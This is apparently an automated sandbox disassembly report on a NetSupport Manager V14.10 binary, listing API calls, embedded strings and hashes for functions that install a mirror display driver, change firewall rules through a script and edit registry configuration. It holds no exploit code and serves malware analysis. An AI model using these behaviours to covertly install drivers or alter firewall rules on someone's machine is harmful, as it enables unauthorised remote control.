                                                                                                                        • GetTempFileNameW.KERNEL32(?,00B6D714,00000000,?), ref: 00AFF158
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00AFF16E
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000005), ref: 00AFF1A3
                                                                                                                        Strings
                                                                                                                        • gdihook5.inf, xrefs: 00AFF052
                                                                                                                        • Unloadable mirror detected - update on reboot, xrefs: 00AFF12C
                                                                                                                        • gdihook5 (e2=%d), xrefs: 00AFF430
                                                                                                                        • Try again after removing the 'Block Unsigned Driver Policy', xrefs: 00AFF472
                                                                                                                        • \gdihook5.dll, xrefs: 00AFF0F1
                                                                                                                        • mirror already installed, xrefs: 00AFF105
                                                                                                                        • InstallGdihook5 ret %d, xrefs: 00AFF496
                                                                                                                        • rename %s to %s on reboot ok, xrefs: 00AFF1BB
                                                                                                                        • gdihook5.dll, xrefs: 00AFF0B8
                                                                                                                        • copy %s to %s ok, xrefs: 00AFF186
                                                                                                                        • using .inf=%s, xrefs: 00AFF060
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$DirectorySystem$CopyMoveNameTemp
                                                                                                                        • String ID: Try again after removing the 'Block Unsigned Driver Policy'$InstallGdihook5 ret %d$Unloadable mirror detected - update on reboot$\gdihook5.dll$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$gdihook5.inf$mirror already installed$rename %s to %s on reboot ok$using .inf=%s
                                                                                                                        • API String ID: 3049351088-2506460843
                                                                                                                        • Opcode ID: 925f66839e6926c962de7c7b9bb31f17d2228bc6c63676dbe083f27b1e211f4f
                                                                                                                        • Instruction ID: 92fc79663d7a70cf21ce1f8cb5759758abdf018fb5e66703da6e890b1ed544dd
                                                                                                                        • Opcode Fuzzy Hash: 925f66839e6926c962de7c7b9bb31f17d2228bc6c63676dbe083f27b1e211f4f
                                                                                                                        • Instruction Fuzzy Hash: 1B51E376E0021A9BCB20AB949C42BBBB3B9AF44704F1446F5FA09572C2FA745E44CF56
                                                                                                                        Function 00AE53D0 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 219registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,5E06C67B), ref: 00AE541B
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B6A054,00000000,?,00000000,?,?), ref: 00AE550C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AE554D
                                                                                                                        • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 00AE555E
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00AE556B
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AE5580
                                                                                                                        • RegSetValueExW.ADVAPI32(?,nssCurrConfig,00000000,00000001,?,?), ref: 00AE563A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCriticalSection$CreateDeleteEnterLeaveValue
                                                                                                                        • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp$CurrConfig$MiniDumpType$_debug$err == 0$nssCurrConfig$traceConfig
                                                                                                                        • API String ID: 2221511283-2617431121
                                                                                                                        • Opcode ID: 6adf33c84747e1c0353d01c8186396b79559395a7c63cf9bac4659da27dcc3ae
                                                                                                                        • Instruction ID: e94b938fd5724b9295ed1f6c3b51118825475e12db18d6a4acbd492473f5e057
                                                                                                                        • Opcode Fuzzy Hash: 6adf33c84747e1c0353d01c8186396b79559395a7c63cf9bac4659da27dcc3ae
                                                                                                                        • Instruction Fuzzy Hash: 9081CE71A007489FDF24DF34DC46FAAB3F9FB84718F448598E50A9B291DB74A944CB60
                                                                                                                        Function 00AFC800 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 208COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,00000000,00AE3AE9,?,?,00000000), ref: 00AFC858
                                                                                                                        • GetLastError.KERNEL32 ref: 00AFC86B
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00AFC86E
                                                                                                                        • wsprintfW.USER32 ref: 00AFC884
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileMappingOpenwsprintf
                                                                                                                        • String ID: can't open filemap(%s), gle=%d (x%x)$cant map$openevent error$ver dead$ver unknown$zero pid
                                                                                                                        • API String ID: 3808650745-1998751255
                                                                                                                        • Opcode ID: 9250fd4c8841e791cd933f43ffff432e8d5878a8985223be99e7ea5d3fe4fbd4
                                                                                                                        • Instruction ID: 0d9dddcb13c536b40486630b505d7b567a3f0c6f6c9add033213cee9f198657d
                                                                                                                        • Opcode Fuzzy Hash: 9250fd4c8841e791cd933f43ffff432e8d5878a8985223be99e7ea5d3fe4fbd4
                                                                                                                        • Instruction Fuzzy Hash: F761D971B4070C9AD725EFA5DD05FBA73E8EB94710F00419EFA06972C1EEB0AA04CB94
                                                                                                                        Function 00B1CE20 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 158windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B1CE67
                                                                                                                        • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00B1CE84
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00B1CEA5
                                                                                                                        • GetDC.USER32(00000000), ref: 00B1CF5A
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B1CF64
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B1CF6E
                                                                                                                        • GetTextExtentPoint32W.GDI32(00000000,00B71584,00000001,?), ref: 00B1CF89
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1CF97
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B1CF9E
                                                                                                                        • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00B1CFD0
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B1CFDC
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B1CFE5
                                                                                                                        • GetMenuInfo.USER32(?,?), ref: 00B1D074
                                                                                                                        • SetMenuInfo.USER32(?,0000001C), ref: 00B1D090
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInfoObject$DeleteMenuSelect$CompatibleExtentFontIndirectParametersPoint32ReleaseSectionSystemText_memset
                                                                                                                        • String ID: ($IncreaseMenuItemHeight
                                                                                                                        • API String ID: 2580152395-1213050523
                                                                                                                        • Opcode ID: 1f4b9ab4fc44c33a839769f5e0a94e779e41d0a8fe8bb11eb59626bf78ac6b4d
                                                                                                                        • Instruction ID: 3c243330fbb051e3142ed9b1eb0ae00b3562e8957d7a65de6b5e074589e4b7b5
                                                                                                                        • Opcode Fuzzy Hash: 1f4b9ab4fc44c33a839769f5e0a94e779e41d0a8fe8bb11eb59626bf78ac6b4d
                                                                                                                        • Instruction Fuzzy Hash: C76119B09012289FDB60CF68DD89BD9BBF9EB48304F4041E9E60DE7250EB754A85CF65
                                                                                                                        Function 00B10200 Relevance: 26.6, APIs: 3, Strings: 12, Instructions: 371COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B1024B
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B044E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,5E06C67B,00000000,00000000), ref: 00B0452B
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00B1048C
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B1054A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumOpen__wcsicoll__wcsnicmpwsprintf
                                                                                                                        • String ID: %s\%s$ConfigList$Files\AppData$Files\CommonAppData$Files\LocalAppData$Files\Shared$General\ProductId$IsA()$Set HKLM\...%s\Files\Shared=1$Software\Productive Computer Insight$chg HKLM %s to %s from %s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 89132307-710025092
                                                                                                                        • Opcode ID: c02917fdc76c745b5431e7389ff6bf8087ae236d62a9c1a2e49a511e57df37b0
                                                                                                                        • Instruction ID: 3431c34aaeed785f26cba4ecba12b5cb777a2852f7b46990a7840a6806c539e5
                                                                                                                        • Opcode Fuzzy Hash: c02917fdc76c745b5431e7389ff6bf8087ae236d62a9c1a2e49a511e57df37b0
                                                                                                                        • Instruction Fuzzy Hash: 6CE18C719106199FDB20EB54DC92BEEB7F6EFA4304F0041E8E50963291DFB26E98CE50
                                                                                                                        Function 00AE7020 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 304COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,5E06C67B), ref: 00AE7099
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,5E06C67B), ref: 00AE71D6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterEnvironmentExpandSectionStrings
                                                                                                                        • String ID: ..\CTL32\Config.cpp$@$_present$buflen >= sizeof (TCHAR)
                                                                                                                        • API String ID: 1631139872-3711079296
                                                                                                                        • Opcode ID: 2a37453cfd1b0d3ffc59b9279fa675bc0f2a19638770ae704f819dc7775a243e
                                                                                                                        • Instruction ID: 351042ff93c3a9a6ca1642eaac7bf5ca27d95eb6443b34f062ae5174d7d8755e
                                                                                                                        • Opcode Fuzzy Hash: 2a37453cfd1b0d3ffc59b9279fa675bc0f2a19638770ae704f819dc7775a243e
                                                                                                                        • Instruction Fuzzy Hash: 4EB1D47190425A9BCB34DF65DC89BEEB3B5FF54310F144699E8099B290EB70AE80CBD0
                                                                                                                        Function 00B0D1A0 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 289COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __localtime64__time64
                                                                                                                        • String ID: ?$EVAL$IsA()$authcode$currentver$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$expiredver$expiryday$expirymonth$expiryyear$startday$startmonth$startyear
                                                                                                                        • API String ID: 3099643277-4160200971
                                                                                                                        • Opcode ID: 92cd3c3610e50c02fe53af6dfb11ca5cc33e0acc49affbd5ada467daee2a0811
                                                                                                                        • Instruction ID: 218d2460c1a68485d07db05d2f48969c7b41ef6dd4315971cd7f4d586d35b089
                                                                                                                        • Opcode Fuzzy Hash: 92cd3c3610e50c02fe53af6dfb11ca5cc33e0acc49affbd5ada467daee2a0811
                                                                                                                        • Instruction Fuzzy Hash: B6B1AE71D002099AEB10EBE4C982BEEBBF5EF68714F5045D8E911772C1EB75AE04CB61
                                                                                                                        Function 00B22880 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 217registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,HARDWARE\DeviceMap\Video,00000000,00020019,?), ref: 00B228C0
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,\Device\Video0,00000000,?,?,?), ref: 00B228FB
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B22912
                                                                                                                        • _wcschr.LIBCMT ref: 00B22927
                                                                                                                        • _wcschr.LIBCMT ref: 00B22939
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,?,?), ref: 00B22A0A
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,InstalledDisplayDrivers,?,?,?,00000200), ref: 00B22A4E
                                                                                                                        • RegSetValueExW.ADVAPI32(?,InstalledDisplayDrivers,00000000,00000007,?,?), ref: 00B22A68
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B22A96
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B22AE9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseValue$OpenQuery_wcschr
                                                                                                                        • String ID: HARDWARE\DeviceMap\Video$InstalledDisplayDrivers$\ControlSet$\Device\Video0$gfff
                                                                                                                        • API String ID: 2837386005-2659084398
                                                                                                                        • Opcode ID: f10ec2a3636b211a37689f55135ca2c8801034c1e1a978b96f31ce51d2ea552e
                                                                                                                        • Instruction ID: a381a635202a4606da64f0d7bf185fdd5143325f55836963ca5a2cca1eebc357
                                                                                                                        • Opcode Fuzzy Hash: f10ec2a3636b211a37689f55135ca2c8801034c1e1a978b96f31ce51d2ea552e
                                                                                                                        • Instruction Fuzzy Hash: C8619472E00229ABDB20DF54EC89FEB73B9EB94310F1441E9F50DD7251EA745E848B91
                                                                                                                        Function 00B192B0 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                        • _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B137C0: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?), ref: 00B137E0
                                                                                                                        • _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • _memset.LIBCMT ref: 00B194CA
                                                                                                                          • Part of subcall function 00B3B767: __isdigit_l.LIBCMT ref: 00B3B78C
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B19528
                                                                                                                          • Part of subcall function 00B38406: __fassign.LIBCMT ref: 00B383E3
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00B19593
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseOpenQueryValueVersion__fassign__isdigit_l__wcsnicmp_wcsncpy
                                                                                                                        • String ID: ($CSDVersion$CurrentBuild$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                        • API String ID: 1058963001-592434882
                                                                                                                        • Opcode ID: 14235be714c16983127eafa5c768682aad2907b3be08a65b10eaf7b6be508390
                                                                                                                        • Instruction ID: eb3cf151fd05390f015c3a976457a954da4a9db10dadcb60b06a35e4d0c7c190
                                                                                                                        • Opcode Fuzzy Hash: 14235be714c16983127eafa5c768682aad2907b3be08a65b10eaf7b6be508390
                                                                                                                        • Instruction Fuzzy Hash: 81716FB1E00359ABDB25DB61DC42FDE73F5AB14700F5040D9E909B72A1EBB0AE84CB95
                                                                                                                        Function 00B2AB70 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 166registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Deletewsprintf
                                                                                                                        • String ID: DisplayName$InstallUninstall$NSM$NetSupport Manager for Windows (32 bit) V14.10$Software\Microsoft\Windows\CurrentVersion\Uninstall\%s$UninstallString$winstall /U /P%s
                                                                                                                        • API String ID: 1732204791-2914868138
                                                                                                                        • Opcode ID: cf027d6a1c576dea15e193b95618fab54b531e301e48e73a91c6a18e16f29f1b
                                                                                                                        • Instruction ID: b14e3e5e144b392ade9a5cf783239ce64b354bc315dfba40bd516987b99a1f18
                                                                                                                        • Opcode Fuzzy Hash: cf027d6a1c576dea15e193b95618fab54b531e301e48e73a91c6a18e16f29f1b
                                                                                                                        • Instruction Fuzzy Hash: 1251DB71A00218ABDB10EB64EC56FBB73E8EB44710F0045E9F90DD7291EEB5AD44CB91
                                                                                                                        Function 00AF8180 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 156sleepprocesssynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 00AF8267
                                                                                                                        • _memset.LIBCMT ref: 00AF8278
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 00AF82E0
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF8309
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00AF8314
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF8329
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleObjectProcessSingleSleepWait_memsetwsprintf
                                                                                                                        • String ID: *** Use ICFConfig2 ***$CreateProcess() failed: $D$WScript.exe icfconfig.vbs %s "%s" "%s"$disable$enable$remove
                                                                                                                        • API String ID: 3099735214-3812129836
                                                                                                                        • Opcode ID: b81c1b56a499be839947e8a30084a2be95fdd46a227e22e03df870db75d70cf1
                                                                                                                        • Instruction ID: 495e66a53b80723223d8d399d7d96044cc2bcd09321008963c84e164e0409905
                                                                                                                        • Opcode Fuzzy Hash: b81c1b56a499be839947e8a30084a2be95fdd46a227e22e03df870db75d70cf1
                                                                                                                        • Instruction Fuzzy Hash: AC51DDB1E4031CABDF20ABE5DD45FBA73B8AB54700F1006A5F605EB291DF789E408B65
                                                                                                                        Function 00AFF073 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 141fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF0CD
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF145
                                                                                                                        • GetTempFileNameW.KERNEL32(?,00B6D714,00000000,?), ref: 00AFF158
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00AFF16E
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000005), ref: 00AFF1A3
                                                                                                                        • wsprintfW.USER32 ref: 00AFF436
                                                                                                                        Strings
                                                                                                                        • Unloadable mirror detected - update on reboot, xrefs: 00AFF12C
                                                                                                                        • gdihook5 (e2=%d), xrefs: 00AFF430
                                                                                                                        • Try again after removing the 'Block Unsigned Driver Policy', xrefs: 00AFF472
                                                                                                                        • \gdihook5.dll, xrefs: 00AFF0F1
                                                                                                                        • mirror already installed, xrefs: 00AFF105
                                                                                                                        • InstallGdihook5 ret %d, xrefs: 00AFF496
                                                                                                                        • rename %s to %s on reboot ok, xrefs: 00AFF1BB
                                                                                                                        • gdihook5.dll, xrefs: 00AFF0B8
                                                                                                                        • copy %s to %s ok, xrefs: 00AFF186
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
